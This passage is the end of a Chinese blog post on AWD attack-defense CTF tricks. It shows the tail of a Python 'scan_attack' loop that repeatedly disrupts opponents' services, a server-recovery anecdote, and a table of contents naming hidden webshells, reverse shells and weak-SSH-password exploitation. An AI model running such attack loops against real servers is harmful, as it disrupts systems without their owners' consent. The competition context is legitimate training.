print(&quot;&#x6B63;&#x5728;&#x6405;&#x5C4E;:&quot;+str(i)+&apos;|&apos;+ii+&apos;|&apos;+iii)</span><br><span class="line">                        time.sleep(0.1)</span><br><span class="line">                    except Exception as e:</span><br><span class="line">                        time.sleep(0.1)</span><br><span class="line">                        pass</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__ == &apos;__main__&apos;:</span><br><span class="line">    scan_attack()</span><br></pre></td></tr></table></div></figure>



<hr>
<p>&#x5728;&#x4FEE;&#x6539;weblogger&#x7684;&#x65F6;&#x5019;&#x597D;&#x50CF;&#x5220;&#x4E86;&#x4E00;&#x4E9B;&#x4E0D;&#x8BE5;&#x5220;&#x7684;tmp&#x76EE;&#x5F55;&#x4E0B;&#x7684;&#x4E1C;&#x897F;&#x3002;&#x3002;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">[root@VM-4-4-centos tmp]# ls</span><br><span class="line">mysql.sock</span><br><span class="line">php-cgi-56.sock</span><br><span class="line">php-cgi-74.sock</span><br><span class="line">php-cgi-81.sock</span><br><span class="line">stargate.lock</span><br><span class="line">systemd-private-b7e21ae10bde4e158e1325f214270e25-ntpd.service-E4QbRW</span><br></pre></td></tr></table></div></figure>

<p>&#x6551;&#x56DE;&#x6765;&#x4E86;&#xFF0C;&#x91CD;&#x542F;&#x670D;&#x52A1;&#xFF0C;&#x6216;&#x8005;&#x91CD;&#x65B0;&#x5B89;&#x88C5;php&#x63D2;&#x4EF6;&#x5C31;&#x6551;&#x56DE;&#x6765;&#x4E86;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo service mysql restart</span><br><span class="line">sudo php-fpm restart</span><br></pre></td></tr></table></div></figure>

<p>&#x7136;&#x540E;&#x4F20;&#x4E0A;&#x4E86;mysql.cgi&#x548C;56&#x7684;phpcgi</p>
<p>&#x7136;&#x540E;&#x56E0;&#x4E3A;&#x7F51;&#x7AD9;&#x7528;&#x7684;&#x662F;74php&#x6240;&#x4EE5;&#x540E;&#x9762;&#x8FD8;&#x662F;&#x5728;&#x5B9D;&#x5854;&#x91CD;&#x65B0;&#x5B89;&#x88C5;&#x7684;php,&#x540E;&#x9762;&#x91CD;&#x65B0;&#x542F;&#x52A8;&#x7AD9;&#x70B9;&#x5C31;&#x597D;&#x4E86;</p>
<p>&#x5728;&#x5B89;&#x88C5;weblogger&#x7684;&#x65F6;&#x5019;&#xFF0C;&#x6CE8;&#x610F;&#x8981;&#x8BBE;&#x7F6E;&#x4E86;&#x8DEF;&#x5F84;&#xFF0C;&#x5BF9;&#x4E8E;&#x6587;&#x4EF6;&#x5939;&#x8981;&#x5148;&#x6388;&#x6743;&#xFF0C;&#x6B63;&#x786E;&#x914D;&#x7F6E;&#x6570;&#x636E;&#x5B58;&#x653E;&#x7684;tmp&#x5730;&#x65B9;&#xFF0C;&#x4E3A;&#x4E86;&#x4FDD;&#x9669;&#x8D77;&#x89C1;&#x653E;&#x5728;var&#x53CA;&#x5B50;&#x76EE;&#x5F55;&#x3002;&#x5176;&#x4ED6;&#x5E55;&#x5E03;&#x4E0D;&#x77E5;&#x9053;&#x80FD;&#x4E0D;&#x80FD;&#x8FDB;&#x53BB;&#x4FEE;&#x6539;&#xFF0C;&#x5C24;&#x5176;&#x662F;&#x7CFB;&#x7EDF;tmp&#xFF0C;&#x751F;&#x6210;&#x540E;&#x662F;&#x6CA1;&#x6709;root&#x6743;&#x9650;&#x662F;&#x6CA1;&#x6CD5;&#x4FEE;&#x6539;&#x7684;&#xFF0C;&#x56E0;&#x4E3A;&#x8BBF;&#x95EE;&#x4E0D;&#x4E86;&#xFF0C;&#x4E5F;&#x5199;&#x4E0D;&#x4E86;&#xFF0C;&#x53E6;&#x5916;&#x5982;&#x679C;php&#x91CC;&#x9762;&#x7684;&#x7248;&#x672C;&#x4E0D;&#x540C;&#xFF0C;&#x4E5F;&#x662F;&#x6CA1;&#x6CD5;&#x8FD0;&#x884C;&#x7684;</p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ END ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">Author: </span><span class="copyright-author__value"><a href="http://example.com">Kirsten Carton</a></span></div><div class="copyright-link"><span class="copyright-link__name">Link: </span><span class="copyright-link__value"><a href="http://example.com/2023/04/10/awd-awd/">http://example.com/2023/04/10/awd-awd/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">Copyright: </span><span class="copyright-notice__value">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> unless stating additionally</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="http://example.com/tags/awd/">awd</a></span><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="http://example.com/tags/shell-script/">shell-script</a></span><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="http://example.com/tags/tricks/">tricks</a></span></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2023/04/13/Shell-scripting/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">Shell-scripting</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2023/04/01/Python-TCP-socket/"><span class="paginator-prev__text">Python-TCP-socket</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">Catalog</span><span class="sidebar-nav-ov">Overview</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4"><span class="toc-number">1.</span> <span class="toc-text">
          常用命令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%93%E5%8C%85"><span class="toc-number">1.1.</span> <span class="toc-text">
          打包</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A4%87%E4%BB%BD%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="toc-number">1.2.</span> <span class="toc-text">
          备份数据库</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%81%A2%E5%A4%8D%E5%A4%87%E4%BB%BD"><span class="toc-number">1.2.1.</span> <span class="toc-text">
          恢复备份</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%87%8D%E7%BD%AEmysql%E5%AF%86%E7%A0%81"><span class="toc-number">1.2.2.</span> <span class="toc-text">
          重置mysql密码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%A5%BD%E7%94%A8%E7%9A%84%E5%AF%86%E7%A0%81%EF%BC%81%EF%BC%81%EF%BC%81"><span class="toc-number">1.2.3.</span> <span class="toc-text">
          好用的密码！！！</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%87%8D%E5%90%AF-apache2-%E5%92%8C-nigix"><span class="toc-number">1.3.</span> <span class="toc-text">
          重启 apache2 和 nigix</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%BB%E6%9C%BA%E6%8E%A2%E6%B5%8B"><span class="toc-number">2.</span> <span class="toc-text">
          主机探测</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E4%BA%A4post%E5%8F%82%E6%95%B0%E6%88%96%E8%80%85get%E8%AF%B7%E6%B1%82"><span class="toc-number">2.1.</span> <span class="toc-text">
          提交post参数或者get请求</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%9A%90%E8%97%8Fshell"><span class="toc-number">3.</span> <span class="toc-text">
          隐藏shell</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#shell-php"><span class="toc-number">3.0.1.</span> <span class="toc-text">
          .shell.php</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#shell-php-1"><span class="toc-number">3.0.2.</span> <span class="toc-text">
          -shell.php</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%89%B9%E6%AE%8A%E7%9A%84shell"><span class="toc-number">3.1.</span> <span class="toc-text">
          特殊的shell</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A0%E9%99%A4%E4%B8%8D%E6%AD%BB%E9%A9%AC"><span class="toc-number">3.1.1.</span> <span class="toc-text">
          删除不死马</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9D%80%E6%AD%BB%E4%B8%8D%E6%AD%BB%E9%A9%AC"><span class="toc-number">3.1.2.</span> <span class="toc-text">
          杀死不死马</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89%E6%9D%80%E6%AD%BB%E4%B8%8D%E6%AD%BB%E9%A9%AC"><span class="toc-number">3.1.3.</span> <span class="toc-text">
          条件竞争杀死不死马</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B8%85%E9%99%A4%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">3.1.4.</span> <span class="toc-text">
          清除反弹shell</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A%A1"><span class="toc-number">3.2.</span> <span class="toc-text">
          定时任务</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#crontab"><span class="toc-number">3.2.1.</span> <span class="toc-text">
          crontab</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">3.3.</span> <span class="toc-text">
          反弹shell</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BD%AF%E9%93%BE%E6%8E%A5"><span class="toc-number">4.</span> <span class="toc-text">
          软链接</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#ssh%E5%BC%B1%E5%AF%86%E7%A0%81%E5%88%A9%E7%94%A8"><span class="toc-number">4.1.</span> <span class="toc-text">
          ssh弱密码利用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#alias%E8%B5%B7%E5%88%AB%E5%90%8D"><span class="toc-number">4.2.</span> <span class="toc-text">
          alias起别名</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D"><span class="toc-number">4.3.</span> <span class="toc-text">
          漏洞修复</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90"><span class="toc-number">4.4.</span> <span class="toc-text">
          日志分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E7%9B%91%E6%8E%A7"><span class="toc-number">4.5.</span> <span class="toc-text">
          文件监控</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90"><span class="toc-number">4.6.</span> <span class="toc-text">
          流量分析</span></a></li></ol></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="images/imageone/avator one.jpg" alt="avatar"></div><p class="sidebar-ov-author__text">May you be faithful to yourself,live seriously and freely.</p></div><div class="sidebar-ov-social"><a class="sidebar-ov-social-item" href="https://github.com/KirstenCarton" target="_blank" rel="noopener" data-popover="Github" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-github"></i></span></a><a class="sidebar-ov-social-item" href="https://plus.google.com/" target="_blank" rel="noopener" data-popover="Google" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-google"></i></span></a><a class="sidebar-ov-social-item" href="https://twitter.com/" target="_blank" rel="noopener" data-popover="Twitter" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-twitter"></i></span></a><a class="sidebar-ov-social-item" href="https://youtube.com/" target="_blank" rel="noopener" data-popover="Youtube" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-youtube"></i></span></a></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">37</div><div class="sidebar-ov-state-item__name">Archives</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--categories" href="/categories/"><div class="sidebar-ov-state-item__count">3</div><div class="sidebar-ov-state-item__name">Categories</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">38</div><div class="sidebar-ov-state-item__name">Tags</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="Creative Commons" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">You have read </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2023</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>Kirsten Carton</span></div><div><span>Powered by <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a></span><span> v6.0.0</span><span class="footer__devider">|</span><span>Theme - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.6.2</span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="/js/utils.js?v=2.6.2"></script><script src="/js/stun-boot.js?v=2.6.2"></script><script src="/js/scroll.js?v=2.6.2"></script><script src="/js/header.js?v=2.6.2"></script><script src="/js/sidebar.js?v=2.6.2"></script></body></html>